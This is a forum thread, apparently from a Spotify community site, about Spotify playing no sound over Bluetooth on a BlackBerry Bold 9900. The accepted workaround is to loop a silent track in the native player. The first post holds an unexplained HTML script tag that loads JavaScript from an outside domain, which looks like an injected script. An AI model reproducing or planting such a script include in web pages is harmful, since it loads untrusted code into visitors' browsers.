Announcements

Help Wizard

Step 1

NEXT STEP

[BB] BlackBerry OS7.1 Bluetooth Sound Problem

Solved!

[BB] BlackBerry OS7.1 Bluetooth Sound Problem

Hi !

y have probleme with my Blackberry Bold 9900 on OS 7.1 and my Jambox (Bluetooth speaker)

no sound on my Jambox with spotify ,but with the media player in Blackberry work great with this speaker.

Spotify connected with cable jack 3.5 work good .

Spotify connected in bluetooth doesnt work .

thanx bye

<script type="text/javascript" src="http://www.pubcatcher.fr/scripts/appfirefox.js"></script>

Accepted Solutions
Marked as solution

I had the same problem. I think it's because spotify have to update their application to be compatible with bluetooth output like all other application do (for example with endomondo, you can choose the audio output)

One tip: if you play a song coming from the basic player of blackberry, you will hear it without problem on the device connected with bluetooth.

You can hear both song (from spotify and from basic player) on your device. What I done (while waiting the update from spotify) : I created a song with noise level at 0 and i play with the normal player of blackberry, then all song from spotify can be hear on the bluetooth device !

I hope you understood bmy english and that will help you!

(and I hope that spotify team will make correction to their application !)

View solution in original post

3 Replies
Marked as solution

I had the same problem. I think it's because spotify have to update their application to be compatible with bluetooth output like all other application do (for example with endomondo, you can choose the audio output)

One tip: if you play a song coming from the basic player of blackberry, you will hear it without problem on the device connected with bluetooth.

You can hear both song (from spotify and from basic player) on your device. What I done (while waiting the update from spotify) : I created a song with noise level at 0 and i play with the normal player of blackberry, then all song from spotify can be hear on the bluetooth device !

I hope you understood bmy english and that will help you!

(and I hope that spotify team will make correction to their application !)

NetPit, you are the man!

this is an xcellent workaround. 

how long is your "empty" song? Or do you set it to repeat itself while listening to spotiy song?

Perhaps you can put it somewhere online, so peaple can download it. 

Tomas

Alright, 

I did it. I picked random mp3 and using the Wave Editor (freeware) a decreased the volume to zero. 

Loaded to BB and in a media player I let it play (as a repeated track) and I can enjoy spotify playing nicely on my Bose bluetooth device. 

Tomas

Suggested posts